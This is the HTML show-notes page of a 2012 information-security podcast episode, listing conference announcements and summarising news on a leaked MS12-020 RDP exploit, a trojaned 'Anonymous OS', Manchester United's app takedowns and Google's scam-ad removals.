			<content:encoded><![CDATA[<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 621 for March 16, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad, and Dr. Bonez.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Bristol, UK</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Southwest<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 30-April 1<br class="kix-line-break" /><br />
	Where: Austin, TX<br class="kix-line-break" /><br />
	</span><a href="http://www.infosecsouthwest.com/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.Infosecsouthwest.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012<br class="kix-line-break" /><br />
	Where: Bellingham Technical College &#8211; Bellingham, WA<br class="kix-line-break" /><br />
	</span><a href="http://www.linuxfestnorthwest.org/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012<br class="kix-line-break" /><br />
	Where: MU Forensic Science Center &nbsp;- Huntington, West Virginia<br class="kix-line-break" /><br />
	</span><a href="http://www.appyide.org/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.appyide.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012<br class="kix-line-break" /><br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	</span><a href="http://www.layerone.org/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></p>
<p><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
	Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> <br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	When: July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas<br class="kix-line-break" /><br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Defcon 20<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 26-29, 2012<br class="kix-line-break" /><br />
	Where: Rio Hotel and Casino &#8211; Las Vegas, NV<br class="kix-line-break" /><br />
	</span><a href="http://defcon.org/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://defcon.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	Where: Louisville, KY<br class="kix-line-break" /><br />
	</span><a href="http://www.derbycon.com/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;BSides WTF? &nbsp;Charging for a &ldquo;Free&rdquo; Security Conference. &nbsp;Srsly?</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;&nbsp;</span><a href="http://threatpost.com/en_us/blogs/ms12-020-rdp-exploit-found-researchers-say-code-may-have-leaked-security-vendor-031612"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://threatpost.com/en_us/blogs/ms12-020-rdp-exploit-found-researchers-say-code-may-have-leaked-security-vendor-031612</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">There is a confirmed legitimate working exploit for the MS12-020 RDP vulnerability in Windows circulating already and researchers say it is capable of either crashing or causing a denial-of-service condition on vulnerable machines. Microsoft has warned customers about the possibility of the exploit surfacing quickly and advised them to patch the flaw immediately. The researcher who discovered the vulnerability said that the packet he included in his original advisory was found in the exploit, raising the specter of a data leak somewhere in the pipeline.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The exploit surfaced on a Chinese download site in the last couple of days and researchers have been able to confirm that it causes a blue screen of death on some systems and a DoS condition on other versions of Windows. Experts have said that the RDP bug, which was discovered by Luigi Auriemma, has the potential to be used as the basis for a large-scale worm and the existence of a working exploit is the first step down that road. The exploit will produce a BSOD on Windows 7 and a DoS on Windows XP.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The security research community was buzzing on Friday morning with the news that the exploit from the Chinese site contained an exact copy of the information Microsoft sent out to the members of its Microsoft Active Protection Program (MAPP). That program grants early access to vulnerability and patch information to a select, vetted group of security and antimalware companies, allowing them to prepare defenses for the bugs that Microsoft will patch each month. When the MAPP program began four years ago, Microsoft said that it would take precautions to guard against the possibility of a leak of that valuable information, but didn&#39;t spell out what those measures might be. </span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;The amount of time between the release of a patch and the release of the exploit code [for that patch] continues to shorten and customers have been asking for information to react to this,&rdquo; Mike Reavey of the Microsoft Security Response Center.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.computerweekly.com/news/2240146903/SourceForge-takes-down-Anonymous-OS-Project"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.computerweekly.com/news/2240146903/SourceForge-takes-down-Anonymous-OS-Project</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The open-source collaboration website</span><a href="http://sourceforge.net/"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">SourceForge</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> has taken down an Ubuntu Linux operating system (OS) project purportedly affiliated with online hacktivist group Anonymous, after a review by security experts.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The OS has implied links with the Anonymous hacktivist group, according to the BBC.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But SourceForge said there was no evidence the project was connected with Anonymous, the OS had an intentionally misleading name and was not transparent. </span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SourceForge emphasised the substantial risk people were taking in downloading and installing the Linux distribution. More than 26,000 people downloaded the OS before SourceForge took it down.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Although the project initially appeared to be a security-related operating system, SourceForge said experts verified that it was a security risk and not merely a distribution of security-related utilities, as the project page implied.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;We have therefore decided to take this download offline and suspend this project until we have more information that might lead us to think differently,&quot; the SourceForge community team wrote in a</span><a href="http://sourceforge.net/blog/"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">blog</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;By taking an intentionally misleading name, this project has attempted to capitalise on the press surrounding a well-known movement to push downloads of a project that is less than a week old,&quot; they said.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The creators of the software, which included website sniffing and security tools, claimed they put it together for checking the security of web pages.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Soon after the operating system became available, the AnonOps account on Twitter posted a message saying it was fake and wrapped in Trojans.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Although the allegation by the official Anonymous group has not been verified by independent analysis, Graham Cluley, senior technology consultant for security firm Sophos, said he would not be surprised if there were a Trojan element sneaked into the Anonymous OS.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://paidcontent.org/article/419-man-utd-wants-its-crest-stripped-from-google-play/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://paidcontent.org/article/419-man-utd-wants-its-crest-stripped-from-google-play/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Manchester United football club is demanding that Google bar all Android apps that contain its logo.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The soccer club sent an infringement</span><a href="http://chillingeffects.org/N/223748"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> notice</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> to Google in February to request it remove from Android Market (now called Google Play) apps that contain its famous crest.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="https://play.google.com/store/search?q=man+utd&amp;c=apps"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Many apps on Google Play here</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> re-use the logo, which Manchester United says is</span><a href="http://www.manutd.com/en/Club/Brand-Protection.aspx"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> registered as a trademark</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It is the latest case in which intellectual property law may be broken in arenas like Google Play before proprietors step up to complain.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In January, paidContent reported how dozens of top-tier novels had been repackaged and were available in free, ad-supported Android Market apps without authorisation. Google later removed the apps.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google&rsquo;s laissez faire Android app entry process differs from Apple&rsquo;s famously stringent rules for approval to iTunes Store.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google, Twitter and other online services are receiving a growing number of takedown requests under the U.S. DCMA law, disclosed on ChillingEffects.org. They are engaged in a continual post-publication moderation firefight.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Rick: &nbsp;Knowing that others are inappropriately using your logo, trademarks or copyrighted data is something that most business that develop mobile applications neglect to think about when they initially release an app. &nbsp;This also speaks to some of the issues that Google needs to address.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://nakedsecurity.sophos.com/2012/03/16/google-130-million-scam-ads-axed-in-2011"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://nakedsecurity.sophos.com/2012/03/16/google-130-million-scam-ads-axed-in-2011</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">You think malvertising&#39;s bad on Google </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">now? &nbsp;</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google&#39;s actually reduced scam ads by over 50% year over year from 2010 to 2011, according to a</span><a href="http://googleblog.blogspot.com/2012/03/making-our-ads-better-for-everyone.html"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">blog entry</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> put up on Wednesday by Sridhar Ramaswamy, Google engineering senior VP.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The post includes some proud lauding about Google&#39;s success in scraping off a plague of ad leeches that cling to Google and partner sites, including websites selling counterfeit goods and fraudulent tickets as well as &quot;underground international operations trying to spread malware and spyware.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Success in leech scraping, by the numbers:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;In 2011, advertisers submitted billions of ads to Google, and of those, we disabled more than 130 million ads. And our systems continue to improve&mdash;in fact, in 2011 we reduced the percentage of bad ads by more than 50% compared with 2010. That means that our methods are working. We&rsquo;re also catching the vast majority of these scam ads before they ever appear on Google or on any of our partner networks. For example, in 2011, we shut down approximately 150,000 accounts for attempting to advertise counterfeit goods, and more than 95% of these accounts were discovered through our own detection efforts and risk models.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google uses a combination of technology and review by real, live humans to remove bad ads: i.e., ads for counterfeit goods, for harmful goods (like ads for cigarettes or handguns), or those that lead to malicious download sites that contain malware or viruses.</span></p>
